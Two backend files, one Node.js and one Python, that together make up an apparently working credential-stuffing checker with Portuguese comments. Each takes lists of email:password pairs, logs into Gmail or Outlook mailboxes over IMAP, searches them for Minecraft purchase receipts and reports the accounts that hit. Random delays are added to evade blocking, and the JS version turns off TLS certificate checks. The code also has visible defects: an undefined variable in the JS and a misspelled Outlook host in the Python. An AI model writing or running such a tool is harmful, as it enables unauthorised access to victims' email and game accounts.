File: servidor.js
const express = require('express');
const cors = require('cors');
const imaps = require('imap-simple');

// --- CONFIGURAÇÕES ---
const app = express();
const PORT = 5000;

const MIN_DELAY_SECONDS = 5;
const MAX_DELAY_SECONDS = 15;
const HIGH_VALUE_KEYWORDS = ["receipt", "recibo", "compra", "pedido", "order", "invoice", "confirmation"];
const CONTEXT_KEYWORDS = ["minecraft", "mojang"];
const TRUSTED_SENDERS = ["microsoft", "xbox", "mojang"];

// Middleware para permitir comunicação com o frontend e para entender JSON
app.use(cors());
app.use(express.json());

// --- FUNÇÕES AUXILIARES ---
function getImapConfig(email) {
    const domain = email.split('@')[1].toLowerCase();
    let host = '';
    if (domain.includes('gmail')) {
        host = 'imap.gmail.com';
    } else if (domain.includes('outlook') || domain.includes('hotmail') || domain.includes('live')) {
        host = 'outlook.office365.com';
    } else {
        return null; // Host não conhecido
    }
    return {
        imap: {
            user: email,
            password: password, // A senha será passada depois
            host: host,
            port: 993,
            tls: true,
            authTimeout: 3000,
            tlsOptions: { rejectUnauthorized: false }
        }
    };
}

function scoreEmail(msg) {
    let score = 0;
    const subject = (msg.headers.subject && msg.headers.subject[0]) ? msg.headers.subject[0].toLowerCase() : '';
    const from = (msg.headers.from && msg.headers.from[0]) ? msg.headers.from[0].toLowerCase() : '';

    if (TRUSTED_SENDERS.some(sender => from.includes(sender))) score += 5;
    if (HIGH_VALUE_KEYWORDS.some(keyword => subject.includes(keyword))) score += 3;
    if (CONTEXT_KEYWORDS.some(keyword => subject.includes(keyword))) score += 2;
    if (score >= 10) score += 5;

    return score;
}

async function processAccount(email, password) {
    const config = getImapConfig(email);
    if (!config) {
        return { status: "error", message: "Host IMAP não encontrado" };
    }
    config.imap.password = password;

    let connection;
    try {
        connection = await imaps.connect(config);
        await connection.openBox('INBOX');

        const searchCriteria = ['OR', ['SUBJECT', 'minecraft'], ['SUBJECT', 'mojang']];
        const fetchOptions = { bodies: ['HEADER.FIELDS (FROM SUBJECT DATE)'], struct: true };
        const messages = await connection.search(searchCriteria, fetchOptions);

        let bestEmail = { score: 0, subject: '', from: '' };

        for (const msg of messages) {
            const score = scoreEmail(msg.parts[0].body);
            if (score > bestEmail.score) {
                bestEmail = {
                    score: score,
                    subject: msg.parts[0].body.subject[0],
                    from: msg.parts[0].body.from[0]
                };
            }
        }
        connection.end();
        
        if (bestEmail.score >= 8) {
            return { status: "success", data: bestEmail };
        }
        return { status: "not_found", message: "Nenhuma evidência relevante encontrada." };

    } catch (err) {
        if (connection) connection.end();
        return { status: "error", message: `Falha no login ou na busca: ${err.message}` };
    }
}

// --- ROTA DA API ---
app.post('/verificar', async (req, res) => {
    const { accounts: accountsText } = req.body;

    if (!accountsText) {
        return res.status(400).json({ error: "A lista de contas está vazia." });
    }

    const accounts = accountsText.split('\n').map(line => line.trim()).filter(line => line.includes(':'));
    const foundAccounts = [];

    for (const accountLine of accounts) {
        const [email, password] = accountLine.split(":", 2);
        
        console.log(`Verificando: ${email}`);
        const result = await processAccount(email, password);
        
        if (result.status === "success") {
            console.log(`[+] SUCESSO para ${email}`);
            foundAccounts.push({
                login: accountLine,
                evidence: result.data
            });
        } else {
            console.log(`[-] Falha ou nada encontrado para ${email}: ${result.message}`);
        }
        
        // Pausa anti-bloqueio
        const delay = Math.random() * (MAX_DELAY_SECONDS - MIN_DELAY_SECONDS) + MIN_DELAY_SECONDS;
        console.log(`Aguardando ${delay.toFixed(1)} segundos...`);
        await new Promise(resolve => setTimeout(resolve, delay * 1000));
    }

    res.json({ found_accounts: foundAccounts });
});


// --- INICIAR SERVIDOR ---
app.listen(PORT, () => {
    console.log(`Servidor iniciado em http://127.0.0.1:${PORT}`);
    console.log("Abra o arquivo index.html no seu navegador para usar a interface.");
});

File: servidor.py
from flask import Flask, request, jsonify
from flask_cors import CORS
import imaplib, email, time, random
from email.header import decode_header

# --- CONFIGURAÇÕES ---
app = Flask(__name__)
CORS(app) # Permite a comunicação entre o site e este servidor

MIN_DELAY_SECONDS = 5
MAX_DELAY_SECONDS = 15
HIGH_VALUE_KEYWORDS = ["receipt", "recibo", "compra", "pedido", "order", "invoice", "confirmation"]
CONTEXT_KEYWORDS = ["minecraft", "mojang"]
TRUSTED_SENDERS = ["microsoft", "xbox", "mojang"]

# --- FUNÇÕES (as mesmas do script anterior) ---
def get_imap_host(email_address):
    domain = email_address.split('@')[-1].lower()
    if "gmail" in domain: return "imap.gmail.com"
    if "outlook" in domain or "hotmail" in domain or "live" in domain: return "outlook.office356.com"
    return None

def decode_str(s):
    try:
        parts = decode_header(s)
        return "".join(text.decode(enc or "utf-8", errors="replace") if isinstance(text, bytes) else text for text, enc in parts)
    except: return s

def score_email(msg):
    score = 0
    subject = decode_str(msg.get("Subject", "")).lower()
    frm = decode_str(msg.get("From", "")).lower()
    if any(sender in frm for sender in TRUSTED_SENDERS): score += 5
    if any(keyword in subject for keyword in HIGH_VALUE_KEYWORDS): score += 3
    if any(keyword in subject for keyword in CONTEXT_KEYWORDS): score += 2
    if score >= 10: score += 5
    return score

def process_account(email_addr, password):
    host = get_imap_host(email_addr)
    if not host: return {"status": "error", "message": "Host IMAP não encontrado"}
    
    try:
        conn = imaplib.IMAP4_SSL(host)
        conn.login(email_addr, password)
    except Exception as e:
        return {"status": "error", "message": f"Falha no login: {e}"}

    best_email = {"score": 0, "subject": "", "from": ""}
    try:
        conn.select("INBOX")
        typ, data = conn.search(None, '(OR SUBJECT "minecraft" SUBJECT "mojang")')
        if typ == "OK":
            for mid in data[0].split()[-10:]:
                _, msg_data = conn.fetch(mid, "(RFC822)")
                msg = email.message_from_bytes(msg_data[0][1])
                score = score_email(msg)
                if score > best_email["score"]:
                    best_email = {"score": score, "subject": decode_str(msg.get("Subject", "")), "from": decode_str(msg.get("From", ""))}
    finally:
        conn.logout()

    if best_email["score"] >= 8:
        return {"status": "success", "data": best_email}
    return {"status": "not_found", "message": "Nenhuma evidência relevante encontrada."}


# --- ROTA DA API ---
@app.route('/verificar', methods=['POST'])
def verificar_contas():
    data = request.get_json()
    accounts_text = data.get('accounts', '')
    
    if not accounts_text:
        return jsonify({"error": "A lista de contas está vazia."}), 400

    accounts = [line.strip() for line in accounts_text.split('\n') if ":" in line]
    found_accounts = []

    for account_line in accounts:
        email_addr, password = account_line.split(":", 1)
        
        result = process_account(email_addr, password)
        
        if result.get("status") == "success":
            found_accounts.append({
                "login": account_line,
                "evidence": result["data"]
            })
        
        # Pausa anti-bloqueio
        time.sleep(random.uniform(MIN_DELAY_SECONDS, MAX_DELAY_SECONDS))

    return jsonify({"found_accounts": found_accounts})

# --- INICIAR SERVIDOR ---
if __name__ == '__main__':
    print("Servidor iniciado em http://127.0.0.1:5000")
    print("Abra o arquivo index.html no seu navegador para usar a interface.")
    app.run(port=5000)
